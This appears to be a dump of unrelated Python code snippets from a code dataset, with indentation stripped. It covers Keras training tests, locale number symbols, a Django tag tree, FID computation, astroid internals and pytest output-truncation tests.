out = model.evaluate(input_b_np, [output_a_np, output_b_np], batch_size=10)
out = model.predict({'input_b': input_b_np}, batch_size=10)
out = model.predict(input_b_np, batch_size=10)
assert (len(out) == 2)
a = Input(tensor=tf.Variable(input_a_np, dtype=tf.float32))
a_2 = Dense(4, name='dense_1')(a)
a_2 = Dropout(0.5, name='dropout')(a_2)
model = Model(a, a_2)
model.summary()
optimizer = 'rmsprop'
loss = 'mse'
model.compile(optimizer, loss, metrics=['mean_squared_error'])
out = model.train_on_batch(None, output_a_np)
out = model.train_on_batch(None, output_a_np)
out = model.test_on_batch(None, output_a_np)
out = model.predict_on_batch(None)
out = model.train_on_batch([], output_a_np)
out = model.train_on_batch({}, output_a_np)
out = model.fit(None, output_a_np, epochs=1, batch_size=10)
out = model.fit(None, output_a_np, epochs=1, batch_size=10)
out = model.evaluate(None, output_a_np, batch_size=10)
out = model.evaluate(None, output_a_np, batch_size=10)
out = model.predict(None, steps=3)
out = model.predict(None, steps=3)
assert (out.shape == ((10 * 3), 4))
a = Input(tensor=tf.Variable(input_a_np, dtype=tf.float32))
a_2 = Dense(4, name='dense_1')(a)
model = Model(a, a_2)
model.summary()
optimizer = 'rmsprop'
loss = 'mse'
model.compile(optimizer, loss, metrics=['mean_squared_error'])
out = model.train_on_batch(None, output_a_np)
out = model.train_on_batch(None, output_a_np)
out = model.test_on_batch(None, output_a_np)
out = model.predict_on_batch(None)
out = model.train_on_batch([], output_a_np)
out = model.train_on_batch({}, output_a_np)
out = model.fit(None, output_a_np, epochs=1, batch_size=10)
out = model.fit(None, output_a_np, epochs=1, batch_size=10)
out = model.evaluate(None, output_a_np, batch_size=10)
out = model.evaluate(None, output_a_np, batch_size=10)
out = model.predict(None, steps=3)
out = model.predict(None, steps=3)
assert (out.shape == ((10 * 3), 4)) |
def _get_number_symbols(locale: ((Locale | str) | None), *, numbering_system: (Literal['default'] | str)='latn') -> LocaleDataDict:
parsed_locale = Locale.parse(locale)
numbering_system = _get_numbering_system(parsed_locale, numbering_system)
try:
return parsed_locale.number_symbols[numbering_system]
except KeyError as error:
raise UnsupportedNumberingSystemError(f'Unknown numbering system {numbering_system} for Locale {parsed_locale}.') from error |
class TagTreeModelManager(TagModelManager):
def get_queryset(self):
return TagTreeModelQuerySet(self.model, using=self._db)
get_query_set = get_queryset
def rebuild(self):
for tag in self.all():
tag.slug = None
tag.save()
rebuild.alters_data = True
def as_nested_list(self):
qs = self.all().order_by('name')
root = []
stack = []
for tag in qs:
if (tag.level == 1):
stack = [(tag, [])]
root.append(stack[0])
continue
(current_tag, current_children) = stack[(- 1)]
if (tag.level <= current_tag.level):
up = (current_tag.level - (tag.level - 1))
del stack[(- up):]
(current_tag, current_children) = stack[(- 1)]
new_node = (tag, [])
current_children.append(new_node)
stack.append(new_node)
return root |
class GameOneHotSpottingLabelReader(GameOneHotLabelReaderInterface):
def __init__(self, soccernet_type: str, frame_rate: float, num_classes: int) -> None:
self._frame_rate = frame_rate
self._num_classes = num_classes
self._event_dictionary = choose_spotting_event_dictionary(soccernet_type)
def read(self, game_labels_path: Optional[Path], len_half_one: int, len_half_two: int) -> Tuple[(LabelsAndValid, LabelsAndValid)]:
return read_game_labels(game_labels_path, self._event_dictionary, len_half_one, len_half_two, self._frame_rate, self._num_classes) |
def calculate_fid_folder():
device = torch.device(('cuda' if torch.cuda.is_available() else 'cpu'))
parser = argparse.ArgumentParser()
parser.add_argument('folder', type=str, help='Path to the folder.')
parser.add_argument('--fid_stats', type=str, help='Path to the dataset fid statistics.')
parser.add_argument('--batch_size', type=int, default=64)
parser.add_argument('--num_sample', type=int, default=50000)
parser.add_argument('--num_workers', type=int, default=4)
parser.add_argument('--backend', type=str, default='disk', help='io backend for dataset. Option: disk, lmdb')
args = parser.parse_args()
inception = load_patched_inception_v3(device)
opt = {}
opt['name'] = 'SingleImageDataset'
opt['type'] = 'SingleImageDataset'
opt['dataroot_lq'] = args.folder
opt['io_backend'] = dict(type=args.backend)
opt['mean'] = [0.5, 0.5, 0.5]
opt['std'] = [0.5, 0.5, 0.5]
dataset = create_dataset(opt)
data_loader = DataLoader(dataset=dataset, batch_size=args.batch_size, shuffle=False, num_workers=args.num_workers, sampler=None, drop_last=False)
args.num_sample = min(args.num_sample, len(dataset))
total_batch = math.ceil((args.num_sample / args.batch_size))
def data_generator(data_loader, total_batch):
for (idx, data) in enumerate(data_loader):
if (idx >= total_batch):
break
else:
(yield data['lq'])
features = extract_inception_features(data_generator(data_loader, total_batch), inception, total_batch, device)
features = features.numpy()
total_len = features.shape[0]
features = features[:args.num_sample]
print(f'Extracted {total_len} features, use the first {features.shape[0]} features to calculate stats.')
sample_mean = np.mean(features, 0)
sample_cov = np.cov(features, rowvar=False)
stats = torch.load(args.fid_stats)
real_mean = stats['mean']
real_cov = stats['cov']
fid = calculate_fid(sample_mean, sample_cov, real_mean, real_cov)
print('fid:', fid) |
class ManifestEntryList(List[ManifestEntry]):
def of(entries: List[ManifestEntry]) -> ManifestEntryList:
manifest_entries = ManifestEntryList()
for entry in entries:
if ((entry is not None) and (not isinstance(entry, ManifestEntry))):
entry = ManifestEntry(entry)
manifest_entries.append(entry)
return manifest_entries
def __getitem__(self, item):
val = super().__getitem__(item)
if ((val is not None) and (not isinstance(val, ManifestEntry))):
self[item] = val = ManifestEntry(val)
return val |
class GeneratorModel(FunctionModel, ContextManagerModel):
def __new__(cls, *args, **kwargs):
ret = super().__new__(cls, *args, **kwargs)
generator = AstroidManager().builtins_module['generator']
for (name, values) in generator.locals.items():
method = values[0]
def patched(cls, meth=method):
return meth
setattr(type(ret), (IMPL_PREFIX + name), property(patched))
return ret
def attr___name__(self):
return node_classes.Const(value=self._instance.parent.name, parent=self._instance)
def attr___doc__(self):
return node_classes.Const(value=getattr(self._instance.parent.doc_node, 'value', None), parent=self._instance) |
def _backend() -> str:
if (objects.backend == usertypes.Backend.QtWebKit):
return 'new QtWebKit (WebKit {})'.format(qWebKitVersion())
elif (objects.backend == usertypes.Backend.QtWebEngine):
return str(qtwebengine_versions(avoid_init=('avoid-chromium-init' in objects.debug_flags)))
raise utils.Unreachable(objects.backend) |
def calculate_metrics(correct, guessed, total):
(tp, fp, fn) = (correct, (guessed - correct), (total - correct))
p = (0 if ((tp + fp) == 0) else ((1.0 * tp) / (tp + fp)))
r = (0 if ((tp + fn) == 0) else ((1.0 * tp) / (tp + fn)))
f = (0 if ((p + r) == 0) else (((2 * p) * r) / (p + r)))
return Metrics(tp, fp, fn, p, r, f) |
class AddressBookUI(UserInterface):
def assemble(self):
add = self.define_view('/add', title='Add an address')
add.set_slot('main', AddAddressForm.factory())
self.edit = self.define_view('/edit', view_class=EditView, address_id=IntegerField())
addresses = self.define_view('/', title='Addresses')
addresses.set_slot('main', AddressBookPanel.factory(self))
self.define_transition(Address.events.save, add, addresses)
self.define_transition(Address.events.update, self.edit, addresses)
bookmarks = [f.as_bookmark(self) for f in [addresses, add]]
self.define_page(AddressBookPage, bookmarks)
def get_edit_bookmark(self, address, description=None):
return self.edit.as_bookmark(self, address_id=address.id, description=description) |
class TestTruncateExplanation():
LINES_IN_TRUNCATION_MSG = 2
def test_doesnt_truncate_when_input_is_empty_list(self) -> None:
expl: List[str] = []
result = truncate._truncate_explanation(expl, max_lines=8, max_chars=100)
assert (result == expl)
def test_doesnt_truncate_at_when_input_is_5_lines_and_LT_max_chars(self) -> None:
expl = [('a' * 100) for x in range(5)]
result = truncate._truncate_explanation(expl, max_lines=8, max_chars=(8 * 80))
assert (result == expl)
def test_truncates_at_8_lines_when_given_list_of_empty_strings(self) -> None:
expl = ['' for x in range(50)]
result = truncate._truncate_explanation(expl, max_lines=8, max_chars=100)
assert (len(result) != len(expl))
assert (result != expl)
assert (len(result) == (8 + self.LINES_IN_TRUNCATION_MSG))
assert ('Full output truncated' in result[(- 1)])
assert ('42 lines hidden' in result[(- 1)])
last_line_before_trunc_msg = result[((- self.LINES_IN_TRUNCATION_MSG) - 1)]
assert last_line_before_trunc_msg.endswith('...')
def test_truncates_at_8_lines_when_first_8_lines_are_LT_max_chars(self) -> None:
total_lines = 100
expl = ['a' for x in range(total_lines)]
result = truncate._truncate_explanation(expl, max_lines=8, max_chars=(8 * 80))
assert (result != expl)
assert (len(result) == (8 + self.LINES_IN_TRUNCATION_MSG))
assert ('Full output truncated' in result[(- 1)])
assert (f'{(total_lines - 8)} lines hidden' in result[(- 1)])
last_line_before_trunc_msg = result[((- self.LINES_IN_TRUNCATION_MSG) - 1)]
assert last_line_before_trunc_msg.endswith('...')
def test_truncates_at_8_lines_when_there_is_one_line_to_remove(self) -> None:
expl = ['a' for x in range(9)]
result = truncate._truncate_explanation(expl, max_lines=8, max_chars=(8 * 80))
assert (result == expl)
assert ('truncated' not in result[(- 1)])
def test_truncates_edgecase_when_truncation_message_makes_the_result_longer_for_chars(self) -> None:
line = ('a' * 10)
expl = [line, line]
result = truncate._truncate_explanation(expl, max_lines=10, max_chars=10)
assert (result == [line, line])
def test_truncates_edgecase_when_truncation_message_makes_the_result_longer_for_lines(self) -> None:
line = ('a' * 10)
expl = [line, line]
result = truncate._truncate_explanation(expl, max_lines=1, max_chars=100)
assert (result == [line, line])
def test_truncates_at_8_lines_when_first_8_lines_are_EQ_max_chars(self) -> None:
expl = [(chr((97 + x)) * 80) for x in range(16)]
result = truncate._truncate_explanation(expl, max_lines=8, max_chars=(8 * 80))
assert (result != expl)
assert (len(result) == ((16 - 8) + self.LINES_IN_TRUNCATION_MSG))
assert ('Full output truncated' in result[(- 1)])
assert ('8 lines hidden' in result[(- 1)])
last_line_before_trunc_msg = result[((- self.LINES_IN_TRUNCATION_MSG) - 1)]
assert last_line_before_trunc_msg.endswith('...')
def test_truncates_at_4_lines_when_first_4_lines_are_GT_max_chars(self) -> None:
expl = [('a' * 250) for x in range(10)]
result = truncate._truncate_explanation(expl, max_lines=8, max_chars=999)
assert (result != expl)
assert (len(result) == (4 + self.LINES_IN_TRUNCATION_MSG))
assert ('Full output truncated' in result[(- 1)])
assert ('7 lines hidden' in result[(- 1)])
last_line_before_trunc_msg = result[((- self.LINES_IN_TRUNCATION_MSG) - 1)]
assert last_line_before_trunc_msg.endswith('...')
def test_truncates_at_1_line_when_first_line_is_GT_max_chars(self) -> None:
expl = [('a' * 250) for x in range(1000)]
result = truncate._truncate_explanation(expl, max_lines=8, max_chars=100)
assert (result != expl)
assert (len(result) == (1 + self.LINES_IN_TRUNCATION_MSG))
assert ('Full output truncated' in result[(- 1)])
assert ('1000 lines hidden' in result[(- 1)])
last_line_before_trunc_msg = result[((- self.LINES_IN_TRUNCATION_MSG) - 1)]
assert last_line_before_trunc_msg.endswith('...')
def test_full_output_truncated(self, monkeypatch, pytester: Pytester) -> None:
line_count = 7
line_len = 100
expected_truncated_lines = 2
pytester.makepyfile(("\n def test_many_lines():\n a = list([str(i)[0] * %d for i in range(%d)])\n b = a[::2]\n a = '\\n'.join(map(str, a))\n b = '\\n'.join(map(str, b))\n assert a == b\n " % (line_len, line_count)))
monkeypatch.delenv('CI', raising=False)
result = pytester.runpytest()
result.stdout.fnmatch_lines(['*+ 1*', '*+ 3*', ('*truncated (%d lines hidden)*use*-vv*' % expected_truncated_lines)])
result = pytester.runpytest('-vv')
result.stdout.fnmatch_lines(['* 6*'])
monkeypatch.setenv('CI', '1')
result = pytester.runpytest()
result.stdout.fnmatch_lines(['* 6*']) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.